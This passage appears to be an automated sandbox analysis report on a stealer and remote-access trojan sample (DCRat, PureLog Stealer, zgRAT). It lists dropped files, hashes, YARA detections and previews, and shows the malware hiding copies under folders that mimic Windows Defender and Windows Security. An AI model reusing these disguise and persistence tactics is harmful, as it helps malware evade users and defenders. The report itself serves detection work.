	C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	hfGA6tjyxY.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	3m7cmtctck.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files (x86)\Windows Defender\c5b4cb5e9653cc

Download File

Process:	C:\portintosvc\driverInto.exe
File Type:	ASCII text, with very long lines (918), with no line terminators
Category:	dropped
Size (bytes):	918
Entropy (8bit):	5.920619682545727
Encrypted:	false
SSDEEP:	24:3UAlNYEZcPjD+AW7AayqBkJb15Y9heKxqBGgkAKvkmUZsO:xfejD+nRyqB25Y9hVeRJKv8ZsO
MD5:	73231322D9F62E1BAA46D129C809EEC8
SHA1:	B12EACDA0AB105E61BC593257063E42EF951A737
SHA-256:	27462948C2F30D58DA7B12E6B4C8122E8876632D6AE0A79774024EB2B0AC965C
SHA-512:	766ED55AAE253176ACC6B84D645D1D72C0DB66EB0280B1FC708439B4B453C987D2B967C817C9B5F0B576BAC5C935F4A6E5F201EF35627F83C6FF03ABA2477963
Malicious:	false
Preview:	iLXVfCJ1Px5aAYGbLJ2APQhPBz19FT1gKcBT5wHJcrAKCT1Xc2WLTopRnIUqLJw55ZPhXxfYBshhQXMs7dhN6qNfwtpwbb8T5EOnDT9oW7JkGHBQ6lsrlj9PMuunHt7kuOlLIipnd209hmYpsY00tQrWF9bSiWgmAiz1gzHX6FNts9rjVF5s3G1dhOFIHWEHWO88whJ2Rc3oD7oGR27dbxt3rWTRu9QkAGXdAtwy6CbaNMajk90PYlqifFQaN1IRLSn7kKFiFJgYVSpe5tquIBLYZy85cVkE4KP5jd9Z4SJPFRMMZvfdLYJKGPhwMJGuibeLDu5cuRz026THlvfq0H3gAEyU5MMuMYqnxAJo0Ds3iTSK5ZKanZ4bh8L86lghEFndPqUll10xYA7rwoYgCwGwePFzzLsPgKycpy4PFjywjGChAdMSM9fS819AkfvaIlQNLeB7tJad7TNXMiyV8aChpgeyz3pjxXo80zVfcOiDiBUonlxCqZcsithpANIze1pjpPhXMT3u198oLzKOGm3Y55ZHRqeOGtirVu9YDazXfr1jv3dKD4t17RotzaFfypoIaQSa0vKpxf3NE0WYNTLL9ruEGQinUTj0DsIekCURuDEcXao9DrSeecItgOUkNgVd6CKVs1yK93b5nRqqljjnBFVlkY8VsuENskfVQSRM3IfkBMGOhn8n6sc1rivT3cbOzNNCvVaSRXu2kvkXStyFwaRAIoorh8TaqQvx9EcLNpWj7jQ58XAJnWcY6M3GrsvTETMT9wXORm1GEsCjYssJ7KwTyW1xKVee4CeoX76L9w2BeVUNJUs9AmW3g2fm5kD5IXMBNXLavgJKRvzcCnnzmfeSqkIebTQZs63HJS9vIRNdcLmvDCkR7OSn24VmPr9bQucV1rStn1qVRBzf8X

C:\Program Files (x86)\Windows Defender\services.exe

Download File

Process:	C:\portintosvc\driverInto.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1930240
Entropy (8bit):	7.539435467100607
Encrypted:	false
SSDEEP:	24576:Yp1FzIjET5FFt23t/DSKREhl9PKSPomcL+BMjb+L7uhDLSFDAVB84JeRdLxhLNGq:YBzHgt/DshPCLL+B0LSe853h5GCV
MD5:	31594886C067C61C60A04365C0E2A58C
SHA1:	C2E398B5570DA49B08050CCD48381F96E8368F28
SHA-256:	7309289E7D27AAECDFA582BDBD748DB3EC445B317022B4B842C1CFB91C0B5D84
SHA-512:	56AE556094784B60A2B15EE21AF06E5E34FC60F921BEF406C2AD5254BAE36F6736CF4CF7E589B144E5BB36EDB9863D51F1C65447B7CE35A5F519A67CBAACEC33
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Defender\services.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Defender\services.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83% Antivirus: Virustotal, Detection: 65%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..f.................l............... ........@.. ....................................@.................................P...K....... ............................................................................ ............... ..H............text....j... ...l.................. ..`.rsrc... ............n..............@....reloc...............r..............@..B........................H...........................$...........................................0..........(.... ........8........E........)...M...q...8....(.... ....~w...{....:....& ....8....(.... ....~w...{h...9....& ....8....(.... ....~w...{....:....& ....8z......0.......... ........8........E........=...........u...i...8....~....9.... ....8....8V... ....~w...{....:....& ....8........~....(X...~....(\... ....?.... ....8z...r...ps....z~....(P... .... .... ....s....~....(T....... ....~w...{....:

C:\Program Files\Windows Security\BrowserCore\en-US\931b00cae9730a

Download File

Process:	C:\portintosvc\driverInto.exe
File Type:	ASCII text, with very long lines (865), with no line terminators
Category:	dropped
Size (bytes):	865
Entropy (8bit):	5.907264571116198
Encrypted:	false
SSDEEP:	24:Zh8sbbDOqM9svcrw97Obd+thGD/BsMPGS08YMEoWgKKY:ZhpbbDHv4oQdQYb6MB08AgKKY
MD5:	6E641C28B65CD37EB0C52C0C020511E1
SHA1:	7840F7EF66105D02982A54C9D317174082FF293D
SHA-256:	F2BFC688DC9AFCBE3D0D10DE61F483089862F6BDDB931A59DD9A4E580645E890
SHA-512:	D95BE89CBA6D37548D94F5305AE9EEE58A26CBCB5C48728566D98631C8A6CF732EA8723F851B7D0F2D44E4439DEBB2F078C80C0CF5AEEB855058AED3BBB0148E
Malicious:	false
Preview:	4WD3ZngYuh0o8kMoswlRJ0UhjSMSkcdQege5UU4yoOOVSQOO9FIGaNsDBgTHaNxSDjKbFRUY1wm5l9OSE8SfUX0Qyb3yAxYba6RsGwIrvuOokwbCRBCb4S8qt3moYgXEXLeprfMRzltjIMpB91g9u6gI8l9MKeTPWKQYSwUvyvmTiYhhOlog9YTapWqGgAHVReM85QtNgvL9UNjkEc7izxP81zt6GOPxnQCELil72b9ONTGcxGBDCigePOHFhwGSgXVELfYf0AqXxBuhtRJAMLuFuhy6bfaFVrsz8BQRrgNC2IrOdkWPnGGUnQUnqcDVklCGS5jrA1Tp8rNl0kc1JKbOlXLrrnlPc2cQGk5iAoOwxaW5CsxF9MLZKxe5t19XPDNFP6ePp40f6obLAQp90fPQqCGTG9yJo0gtMQpGOhaEWpdfWT4dMAhuy7ZNzLJpFq0FHs8tljuSFL3Bil7wEV7nTw5P1bQDYv8pyYXoVL2mPOpnDYoOOXkutNvVws1JTr4TMOMKNTa3dUYFHSMdxBzAKO5lmC1mTtTiUVbyMdB56qRYzqNegYWR23J7SkiLbxjuBzuv0XRTA4Dd7hw6yWG5XBpaLdfl5zdJHgX95bnIGCR8zpAvxlWFrnX9KUkX1pXKa4WaJxAWs7zUuqkgduyTdYcdJYyk1QRapGh5Tkl9lAWtyDOduD4H1DrCc2Qv8ZecqYonJoM2IysdBsoGKV0yVJilZfdaT0BLf4DaYkUF0B9DUNAtNKknjqGgzCNnLwjRxh7HpOsjBu7UKfQLetMJPXlzxgkVXq4EbrQxQ3E9bBmyswVUvBJbjaBZ5IUIoXMU032dPd5kpNrOvxGAKQjVhceBp02Ij

C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe

Download File

Process:	C:\portintosvc\driverInto.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1930240
Entropy (8bit):	7.539435467100607
Encrypted:	false
SSDEEP:	24576:Yp1FzIjET5FFt23t/DSKREhl9PKSPomcL+BMjb+L7uhDLSFDAVB84JeRdLxhLNGq:YBzHgt/DshPCLL+B0LSe853h5GCV
MD5:	31594886C067C61C60A04365C0E2A58C
SHA1:	C2E398B5570DA49B08050CCD48381F96E8368F28
SHA-256:	7309289E7D27AAECDFA582BDBD748DB3EC445B317022B4B842C1CFB91C0B5D84
SHA-512:	56AE556094784B60A2B15EE21AF06E5E34FC60F921BEF406C2AD5254BAE36F6736CF4CF7E589B144E5BB36EDB9863D51F1C65447B7CE35A5F519A67CBAACEC33
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83% Antivirus: Virustotal, Detection: 65%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..f.................l............... ........@.. ....................................@.................................P...K....... ............................................................................ ............... ..H............text....j... ...l.................. ..`.rsrc... ............n..............@....reloc...............r..............@..B........................H...........................$...........................................0..........(.... ........8........E........)...M...q...8....(.... ....~w...{....:....& ....8....(.... ....~w...{h...9....& ....8....(.... ....~w...{....:....& ....8z......0.......... ........8........E........=...........u...i...8....~....9.... ....8....8V... ....~w...{....:....& ....8........~....(X...~....(\... ....?.... ....8z...r...ps....z~....(P... .... .... ....s....~....(T....... ....~w...{....:

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xf31f5ca1, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4221438893999715
Encrypted:	false
SSDEEP:	1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
MD5:	2256598D3C908131ABA1726F6CAA5B76
SHA1:	8924AC77792117E05EC0B7B0AB93B4B97557B964
SHA-256:	A0A5FC4A7DA93E2C1F488DDF2FF7095EE89095E379159C4F26CE738E5B8B741D
SHA-512:	B75AF43C2DFD59C423D39AD6B72FD0BB7EE586BE0FF0EF53573BA1DBD1AC3BA3CA795CD9D3340597427622A9A69C37BCD5D20F4F8861275E5C9CB1A62AAD7E09
Malicious:	false
Preview:	..\.... .......A.......X\...;...{......................0.!..........{A.$....\|C.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................kU ;$....\|......................$....\|C..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\931b00cae9730a

Download File

Process:	C:\portintosvc\driverInto.exe
File Type:	ASCII text, with very long lines (721), with no line terminators
Category:	dropped
Size (bytes):	721
Entropy (8bit):	5.91354787453151
Encrypted:	false
SSDEEP:	12:doOL8ySyMBapg2KALEEBK66BLf4yjo3lkqYXTJMQA1qWKVIDtJbm:uOL8/yMBau2KlEY5Kyjo3lkPNXA1qwt4
MD5:	E00A1F9D4F4EB95CB94EB013CE397ED6
SHA1:	6FE4375847A1B583CF677092EEC2C4883B787A02
SHA-256:	79B0192D0301EC7446D948248B5B82618AA68A60FE2E5E081819CD063BBB8FCB
SHA-512:	2ED00F7ECF767F2786AC45651F94A1ED0132FAC65827E1FEE9728F6EC3F1421D8D592547DD093F66078011591D10FD0ED7481999658A3BBA2C523A3987F2C110
Malicious:	false
Preview:	xnIBT7Yx1xXY0xYlxBs2nZdyQGSKQP8qHT2NtGP96Q8ekaDErrSgDeFYKTuMoNglyrRh5K1qvt5Wb9NzCNdj6cmnNeCaVCUtuWq3JgJg0muUjt6LF4Kbt7pWFnTbIbUsYLmESUqfD7tTrREeh1Ua23AwqUygNsYYRB5XG12vOoXvOVoxjy3QG30fLzY8gJSVjUCpWqXp9jLNfOiUpA6YyHSXLaMRd4OFWBM3T9b2bORhrn96RDSfM3gbCoe6eGLFUG0dBoAqjE7k0uqhaQAZlt2dfv1pefYUCMNlwg4mCm5I56kR86fOFvekOX8QxVLEpmhogEv3VXW8ythiKjri9KPQrnWZhnzrb1dTY6v3Lm2rYfwe0ZGNnmFfXR63sWWripg6QOKNyyXXSh1M01iIglEyv75H91KyPKJt8zOlP3ZzPsM0ZuC0xOL7ksLSSDO7niHHYINBn62nMOjDuErPyUBB9LIQo5TMocLqkFcRhBN0VhuWIHhOV9IThFIM96Wsnq8uD3cpmarxGKqcbwIhXF1pT2Ie7QSlpfMoiASPo2l4RVMWZpvMyzUizTaLu7sVIGHl7B4ad22fd6Y8pwFRfFwzKoyPjHfqKPvLNkYXvUs56zF34cf82a0CTSbTMp1WXMVNKMvEXrgKW13Vi5UGmgxtYt15JELGcWite1srrblL4qpcYGuRUuu0YlybVz5SgZsASJ0qMmZK5mzsD

C:\Recovery\XXPWErhsUbDrk.exe

Download File

Process:	C:\portintosvc\driverInto.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1930240
Entropy (8bit):	7.539435467100607
Encrypted:	false
SSDEEP:	24576:Yp1FzIjET5FFt23t/DSKREhl9PKSPomcL+BMjb+L7uhDLSFDAVB84JeRdLxhLNGq:YBzHgt/DshPCLL+B0LSe853h5GCV
MD5:	31594886C067C61C60A04365C0E2A58C
SHA1:	C2E398B5570DA49B08050CCD48381F96E8368F28
SHA-256:	7309289E7D27AAECDFA582BDBD748DB3EC445B317022B4B842C1CFB91C0B5D84
SHA-512:	56AE556094784B60A2B15EE21AF06E5E34FC60F921BEF406C2AD5254BAE36F6736CF4CF7E589B144E5BB36EDB9863D51F1C65447B7CE35A5F519A67CBAACEC33
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83% Antivirus: Virustotal, Detection: 65%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..f.................l............... ........@.. ....................................@.................................P...K....... ............................................................................ ............... ..H............text....j... ...l.................. ..`.rsrc... ............n..............@....reloc...............r..............@..B........................H...........................$...........................................0..........(.... ........8........E........)...M...q...8....(.... ....~w...{....:....& ....8....(.... ....~w...{h...9....& ....8....(.... ....~w...{....:....& ....8z......0.......... ........8........E........=...........u...i...8....~....9.... ....8....8V... ....~w...{....:....& ....8........~....(X...~....(\... ....?.... ....8z...r...ps....z~....(P... .... .... ....s....~....(T....... ....~w...{....:

C:\Users\Default\Pictures\931b00cae9730a

Download File

Process:	C:\portintosvc\driverInto.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	245
Entropy (8bit):	5.798926399604822
Encrypted:	false
SSDEEP:	6:XWYWRWgyZUcT9GMd9YLFkOun+9SGsop3hUBXq59UQ8FXhlqjIYQn:m7RWg1iAMALOOnJZhUkIPlq0YQ
MD5:	BC80813E9180B68B133953FBAE7E083B
SHA1:	97B71AA2D646C5E7ABB05A981A29247B4C0C949A
SHA-256:	40391C15B50A856F528F0D207232A09867D7F43BBDDF69EAF5351CEB697709AF
SHA-512:	9A0A5E52CD28BA83EED4C4F5533CE908AD070BE27C65711F632A4CC6741D86F85F65ACE5F050C33B50808A83C3998D1C0ACFC8DD8CDC848508C944ABDC120667
Malicious:	false
Preview:	P7XgbSwNstR3Vu0nFh7V1E0n2PjsQS7qlcDvQVOCfyGwreFo2WV6q4XKHtnMsD6avkR3rFWuS50D8E5YJ5z46B9qF2ngrCTb1qAHMM7x9lnvETMDxPCxOBdukkxyb0DQmZLRDyL77C5VXNmvpksbAfNzMQgmYIVJhXJoI5A9EE0LGHWW7CJ1HlQGMVEwSjjyqvxAE8nujtX5oBtF3JoW9eB6HCcw0NqefBfUUWS9YYRXNUbKm92J5

C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Download File

Process:	C:\portintosvc\driverInto.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1930240
Entropy (8bit):	7.539435467100607
Encrypted:	false
SSDEEP:	24576:Yp1FzIjET5FFt23t/DSKREhl9PKSPomcL+BMjb+L7uhDLSFDAVB84JeRdLxhLNGq:YBzHgt/DshPCLL+B0LSe853h5GCV
MD5:	31594886C067C61C60A04365C0E2A58C
SHA1:	C2E398B5570DA49B08050CCD48381F96E8368F28
SHA-256:	7309289E7D27AAECDFA582BDBD748DB3EC445B317022B4B842C1CFB91C0B5D84
SHA-512:	56AE556094784B60A2B15EE21AF06E5E34FC60F921BEF406C2AD5254BAE36F6736CF4CF7E589B144E5BB36EDB9863D51F1C65447B7CE35A5F519A67CBAACEC33
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83% Antivirus: Virustotal, Detection: 65%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..f.................l............... ........@.. ....................................@.................................P...K....... ............................................................................ ............... ..H............text....j... ...l.................. ..`.rsrc... ............n..............@....reloc...............r..............@..B........................H...........................$...........................................0..........(.... ........8........E........)...M...q...8....(.... ....~w...{....:....& ....8....(.... ....~w...{h...9....& ....8....(.... ....~w...{....:....& ....8z......0.......... ........8........E........=...........u...i...8....~....9.... ....8....8V... ....~w...{....:....& ....8........~....(X...~....(\... ....?.... ....8z...r...ps....z~....(P... .... .... ....s....~....(T....... ....~w...{....:

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\driverInto.exe.log

Download File

Process:	C:\portintosvc\driverInto.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1824
Entropy (8bit):	5.3789451538423645
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkrJH1HzHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktVTqZ4vwmj0qD
MD5:	322F9A97899B51570EC1545F62FABE64
SHA1:	99E83F6741DF67F27B3D0B59553CEDAAF9C1C61E
SHA-256:	3D54C2AA2F223A8BE51900A9E88A22C3C66A6BD2E44A9BB000F1A032E48019EA
SHA-512:	34C7C23685E4159B86C2381DA1307C4CC58B99A9DE5A24F38683C1A701C2558201C016A915C9A7EA07C5089DE14F934E966D8D7804DACBFF70AD126C568C34F2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKey

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul3nqth:NllUa
MD5:	851531B4FD612B0BC7891B3F401A478F
SHA1:	483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
SHA-256:	383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
SHA-512:	A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
Malicious:	false
Preview:	@...e.................................&..............@..........

C:\Users\user\AppData\Local\Temp\0Iv3hBTsfc

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0L4ikCTOAp

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\12amCzK2TW

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\13XpJa46MX

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1HT2VriCdk

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1XLlMziEAg

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1hMfRAEMbM

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\28moAYly7n.bat

Download File

Process:	C:\portintosvc\driverInto.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	192
Entropy (8bit):	5.206337283652031
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1WDEQC3BhddAl+z1xQXzXN24iyBktKcKZG1t+kiER:hCRLuVFOOr+DE1WD5yddASG7NEyKOZGN
MD5:	85A0CC0D428F7D89284B4E37CFB4AEFD
